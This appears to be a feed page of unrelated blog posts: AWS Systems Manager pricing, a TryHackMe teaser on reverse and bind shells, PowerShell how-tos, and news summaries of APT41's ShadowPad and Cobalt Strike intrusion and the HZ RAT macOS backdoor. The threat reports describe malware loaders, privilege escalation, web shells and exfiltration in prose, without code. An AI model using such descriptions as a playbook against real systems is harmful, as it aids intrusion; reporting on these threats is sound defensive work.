You can monitor and fix operational problems with all of your AWS applications and resources, including Amazon Elastic Compute Cloud (EC2), Amazon Relational Database Service (RDS), Amazon Elastic Container Service (ECS), and Amazon Elastic Kubernetes Service (EKS) instances, as well as in multicloud and hybrid environments, using the unified user interface that AWS Systems Manager offers. With AWS Systems Manager, you may begin using the benefits of the AWS Free Tier without paying a dime. No upfront obligations or minimum costs apply. There may be restrictions.

AWS Free Tier

The following functionalities of AWS Systems Manager are available to you for free as part of the AWS Free Tier. There may be restrictions.

Explorer

Enabling Explorer does not incur any further fees. There may be restrictions.

The dashboard of Explorer is populated by paid OpsCenter APIs (GetOpsSummary). These API queries will incur fees. The Export to CSV option uses an aws:executeScript action step to run an Automation document. The cost of these actions may be determined by Automation pricing.

For more details please visit the AWS systems manager pricing page.

In conclusion

Gaining visibility and control over your computing infrastructure and carrying out operational tasks at scale need the use of Systems Manager. Through a centralized dashboard, the new experience provides a centralized view of all your nodes across AWS accounts, on-premises, and multicloud environments. It also integrates Amazon Q Developer for natural language queries and allows one-click SSM Agent troubleshooting. By going to the Systems Manager panel and following the simple steps, you may activate the new experience without paying more.

Read more on govindhtech.com

What The Shell?: Part 1| TryHackMe

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines. Task 1 What is a shell? shells are what we use when interfacing with a Command Line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and Powershell on Windows. When targeting remote systems it is sometimes possible to force an…

PowerShell Kill a Process from the Command Line

PowerShell Kill a Process from the Command Line #homelab #PowerShellProcessManagement #TerminatingProcessesInWindows #UsingTaskkillCommand #PowerShellVsCommandPrompt #AutomateKillingProcesses #PowerShellForceTermination #ManagingRemoteServerProcesses

Killing processes in Windows has long been the easiest way to deal with unresponsive programs that won’t close using the usual means by clicking the “X” in the top right-hand corner. Generally speaking, using the Windows Task Manager is the first method most use to find and close processes that are not responding. However, using the command line, we can leverage command prompt commands and…

View On WordPress

APT41 Targets Taiwanese Government Research Institute with ShadowPad and Cobalt Strike

Cisco Talos researchers have reported a significant cyber attack on a Taiwanese government-affiliated research institute, attributing the breach to the China-linked group APT41 with medium confidence. The campaign began as early as July 2023 and involved deploying advanced malware tools including ShadowPad and Cobalt Strike. Attack Overview and Attribution The researchers identified several key aspects of the attack: - The campaign targeted a Taiwanese government-affiliated research institute - APT41, a group allegedly comprised of Chinese nationals, is believed to be responsible - Attribution is based on overlaps in tactics, techniques, and procedures (TTPs), infrastructure, and malware families exclusive to Chinese APT groups ShadowPad Malware Deployment A central component of the attack was the use of ShadowPad, a sophisticated modular remote access trojan (RAT): - ShadowPad is known to be sold exclusively to Chinese hacking groups - The malware exploited an outdated vulnerable version of Microsoft Office IME binary as a loader - A customized second-stage loader was used to launch the payload - Two distinct iterations of ShadowPad were encountered during the investigation Cobalt Strike and Custom Loaders The attackers also leveraged Cobalt Strike and developed custom loaders to evade detection: - A unique Cobalt Strike loader written in GoLang was used to bypass Windows Defender - The loader was derived from an anti-AV tool called CS-Avoid-Killing, found on GitHub - Simplified Chinese file and directory paths suggest the attackers' proficiency in the language - PowerShell commands were used to execute scripts for running ShadowPad directly in memory and fetching Cobalt Strike from command and control (C2) servers

The Github repository of Cobalt Strike loader. Exploitation of CVE-2018-0824 APT41 demonstrated advanced capabilities by exploiting a known vulnerability: - The group created a custom loader to inject a proof-of-concept for CVE-2018-0824 directly into memory - This remote code execution vulnerability was used to achieve local privilege escalation - A tool called UnmarshalPwn was employed in the exploitation process Attack Methodology and Persistence The attackers employed various techniques to maintain access and avoid detection: - Three hosts in the targeted environment were compromised - Documents were exfiltrated from the network - A web shell was used to maintain persistence and drop additional payloads - The "quser" command was executed to monitor for other logged-on users, allowing the attackers to pause activities if detected - After deploying backdoors, the web shell and guest account used for initial access were deleted Broader Implications and Ongoing Investigations Cisco Talos researchers emphasized the potential for further discoveries: - Analysis of artifacts from this campaign led to the identification of samples and infrastructure potentially used in different campaigns - Sharing these findings could help the cybersecurity community make connections and enhance ongoing investigations - Indicators of Compromise (IoCs) for this campaign have been released on Cisco Talos' GitHub repository This sophisticated cyber attack on a Taiwanese government research institute highlights the ongoing threat posed by advanced persistent threat (APT) groups like APT41. Complex malware such as ShadowPad, combined with custom loaders and exploitation of known vulnerabilities, demonstrates the evolving tactics employed by state-sponsored threat actors. Read the full article

MacOS Users Beware! The HZ RAT Spy Software Targeting DingTalk and WeChat Exposed

With the rapid development of information technology, network security issues are becoming increasingly prominent. Especially malicious software attacks targeting enterprise-level communication tools are gradually becoming new security challenges. Recently, Kaspersky Lab released a report revealing that a new type of malicious software called HZ RAT is launching large-scale espionage activities against DingTalk and WeChat users on the MacOS platform. This news quickly attracted high attention from the industry.

HZ RAT is a backdoor malicious software initially discovered by the German cybersecurity company DCSO in November 2022. This malicious software is mainly spread through self-extracting zip files or malicious RTF documents. The latter exploits a vulnerability (CVE-2017-11882) that has existed in Microsoft Office for many years. In addition to the traditional Windows platform, the developers of HZ RAT clearly have not ignored the growth potential of the MacOS user group. They have specially designed a version suitable for the MacOS system, enabling this malicious software to run rampant on different operating systems.

According to the discovery of Kaspersky researcher Sergey Puzan, the functions of the HZ RAT MacOS version are similar to those of the Windows version. The difference lies in that it relies on receiving instructions through shell scripts issued by a remote server. This means that whether it is a Windows or MacOS user, once infected with HZ RAT, the attacker can easily remotely control the victim device through the Command and Control (C2) server. HZ RAT can perform a series of dangerous operations, including but not limited to executing PowerShell commands, writing arbitrary files, uploading files to the server, and regularly sending heartbeat information to confirm the status of the target device. These functions make HZ RAT very suitable for stealing credentials and conducting system reconnaissance.

It is worth noting that one of the spreading methods of the HZ RAT MacOS version is to disguise itself as an installation package of a legitimate application, such as OpenVPN Connect. When a user installs this disguised software, the malicious software will establish a connection with the C2 server and start to perform its malicious tasks. Worryingly, HZ RAT can not only extract sensitive information such as WeChat ID, email address, and phone number from DingTalk and WeChat but also obtain more information about the user's organization.

The emergence of the HZ RAT MacOS version indicates that the previous attackers are still active and are constantly evolving their attack methods. Although the main goal of these malicious software currently seems to be to collect user data, considering its lateral movement capabilities, future threats may become more complex and dangerous.

At the same time, this espionage activity targeting MacOS users has once again triggered trust issues about network security products. Looking back at history, the U.S. government once included the products of the Russian cybersecurity giant Kaspersky Lab on the banned sales list due to national security considerations. Now, similar concerns seem to be surrounding Chinese cybersecurity companies. At the beginning of 2024, the U.S. Department of Commerce announced that it added the Chinese cybersecurity enterprise Knownsec to its entity list, restricting its business activities in the U.S. market. This measure is undoubtedly another impact on the global cybersecurity landscape. It not only affects the international business of related enterprises but also triggers extensive discussions about technological autonomy and information security guarantees.

Whether it is the continuous threat of HZ RAT or the frictions generated by international technological competition, they are all reminding us of the importance of network security and the complex situation it faces. In the face of evolving network threats, enterprises and individuals should be more vigilant and strengthen their self-protection awareness. At the same time, governments and enterprises of all countries also need to strengthen cooperation to jointly build a more solid network defense line to ensure the security and stability of the information age.

How to Set Time Zone Using PowerShell: A Step-by-Step Guide

When managing a Remote Desktop Protocol (RDP) server, ensuring that the time zone is correctly set is crucial for maintaining synchronization and avoiding time-related issues. Whether you’re using a free RDP server or have decided to buy RDP services, this guide will walk you through the process of setting the time zone using PowerShell. Follow these steps to ensure your Windows RDP environment is accurately configured.

Understanding the Importance of Setting the Correct Time Zone

Preparing Your Windows RDP Server

Before you begin, make sure you have administrative access to the Windows RDP server. PowerShell is a powerful tool that requires appropriate permissions to make system changes. Whether you’re using a free RDP server or a paid one, administrative rights are a prerequisite for the steps outlined below.

Step-by-Step Guide to Setting the Time Zone Using PowerShell

Step 1: Open PowerShell

First, log into your Windows RDP server. If you’re using an RDP client, connect to your server using the appropriate credentials. Once logged in, open PowerShell with administrative privileges. You can do this by searching for PowerShell in the start menu, right-clicking on it, and selecting “Run as administrator”.

Step 2: Check the Current Time Zone

Before making any changes, it’s a good idea to check the current time zone setting on your RDP server. Use the following command in PowerShell:powershellCopy codeGet-TimeZone

This command will display the current time zone configured on your Windows RDP server. This is especially useful if you’re troubleshooting time zone-related issues on a free RDP server or one that you recently bought.

Step 3: List Available Time Zones

This command will output a list of all time zones that your Windows RDP server supports. Review this list to find the appropriate time zone for your needs. Whether you’re managing a free RDP server or a commercial one, this list is comprehensive and covers all possible configurations.

Step 4: Set the Desired Time Zone

Once you have identified the correct time zone, you can set it using the Set-TimeZone cmdlet. For example, if you want to set the time zone to "Pacific Standard Time", use the following command:powershellCopy codeSet-TimeZone -Name "Pacific Standard Time"

Ensure that you replace “Pacific Standard Time” with the exact name of the time zone you want to set, as listed by the Get-TimeZone -ListAvailable command. This step is the same regardless of whether you're configuring a free RDP server or one you've opted to buy RDP access for.

Step 5: Verify the Change

After setting the new time zone, it’s important to verify that the change has been applied correctly. Use the Get-TimeZone command again to check the current time zone:powershellCopy codeGet-TimeZone

This confirmation step ensures that your Windows RDP server is now operating in the correct time zone. It’s a quick and effective way to double-check your work, whether you’re managing a free RDP server or a purchased one.

Troubleshooting Common Issues

Even though setting the time zone on your Windows RDP server is generally straightforward, you might encounter some issues. Here are a few common problems and how to solve them:

Insufficient Permissions: Ensure you are running PowerShell as an administrator. Without administrative privileges, you won’t be able to change the time zone.

Incorrect Time Zone Name: If you receive an error stating the time zone name is incorrect, double-check the list provided by the Get-TimeZone -ListAvailable command to ensure you have the correct name.

Sync Issues: After setting the time zone, if you still face synchronization issues, check other related settings such as the system clock and time synchronization settings on your RDP server.

Conclusion

Setting the time zone on your Windows RDP server using PowerShell is an essential task for maintaining accurate timekeeping and ensuring the smooth operation of your server environment. Whether you’re managing a free RDP server or a paid service, the steps outlined in this guide will help you configure the time zone correctly. By following this step-by-step guide, you can ensure that your RDP server is always running at the correct time, providing a better experience for all users.

Day 11 at BCS

More work on the powershell script good progress figured out remote command execution and filtering the certs. Was also processing the phishing and spam for the day for the first time.